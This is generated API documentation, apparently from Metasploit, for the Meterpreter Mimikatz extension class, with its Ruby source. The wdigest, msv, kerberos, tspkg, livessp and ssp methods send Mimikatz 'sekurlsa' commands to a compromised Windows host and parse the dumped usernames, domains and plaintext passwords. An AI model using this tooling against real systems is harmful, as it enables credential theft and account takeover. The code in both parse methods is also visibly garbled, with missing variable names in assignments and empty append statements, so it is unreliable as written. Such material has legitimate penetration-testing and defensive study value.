Class: Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz

Inherits:
Rex::Post::Meterpreter::Extension show all
Defined in:
lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb

Overview

Mimikatz extension - grabs credentials from windows memory.

Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz

extension converted by Ben Campbell (Meatballs)

Instance Attribute Summary

Attributes inherited from Rex::Post::Meterpreter::Extension

#name

Instance Method Summary collapse

Constructor Details

#initialize(client) ⇒ Mimikatz


24
25
26
27
28
29
30
31
32
33
34
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 24

def initialize(client)
  super(client, 'mimikatz')

  client.register_extension_aliases(
    [
      {
        'name' => 'mimikatz',
        'ext'  => self
      },
    ])
end

Instance Method Details

#kerberosObject


121
122
123
124
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 121

def kerberos
  result = send_custom_command('sekurlsa::kerberos')
  return parse_creds_result(result)
end

#livesspObject


106
107
108
109
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 106

def livessp
  result = send_custom_command('sekurlsa::livessp')
  return parse_creds_result(result)
end

#msvObject


101
102
103
104
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 101

def msv
  result = send_custom_command('sekurlsa::msv')
  return parse_creds_result(result)
end

#parse_creds_result(result) ⇒ Object


50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 50

def parse_creds_result(result)
  details = CSV.parse(result)
  accounts  =  []
  details.each do |acc|
     = {
      :authid => acc[0],
      :package => acc[1],
      :user => acc[2],
      :domain => acc[3],
      :password => acc[4]
    }
    accounts << 
  end
  return accounts
end

#parse_ssp_result(result) ⇒ Object


66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 66

def parse_ssp_result(result)
  details = CSV.parse(result)
  accounts = []

  return accounts unless details
  details.each do |acc|
    next unless acc.length == 5
    ssps = acc[4].split(' }')
    next unless ssps
    ssps.each do |ssp|
      next unless ssp
      s_acc = ssp.split(' ; ')
      next unless s_acc
      user = s_acc[0].split('{ ')[1]
      next unless user
       = {
        :authid => acc[0],
        :package => acc[1],
        :user => user,
        :domain => s_acc[1],
        :password => s_acc[2],
        :orig_user => acc[2],
        :orig_domain => acc[3]
      }
      accounts << 
    end
  end
  return accounts
end

#send_custom_command(function, args = []) ⇒ Object


46
47
48
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 46

def send_custom_command(function, args=[])
  return Rex::Text.to_ascii(send_custom_command_raw(function, args))
end

#send_custom_command_raw(function, args = []) ⇒ Object


36
37
38
39
40
41
42
43
44
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 36

def send_custom_command_raw(function, args=[])
  request = Packet.create_request('mimikatz_custom_command')
  request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
  args.each do |a|
    request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a)
  end
  response = client.send_request(request)
  return response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
end

#sspObject


111
112
113
114
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 111

def ssp
  result = send_custom_command('sekurlsa::ssp')
  return parse_ssp_result(result)
end

#tspkgObject


116
117
118
119
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 116

def tspkg
  result = send_custom_command('sekurlsa::tspkg')
  return parse_creds_result(result)
end

#wdigestObject


96
97
98
99
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 96

def wdigest
  result = send_custom_command('sekurlsa::wdigest')
  return parse_creds_result(result)
end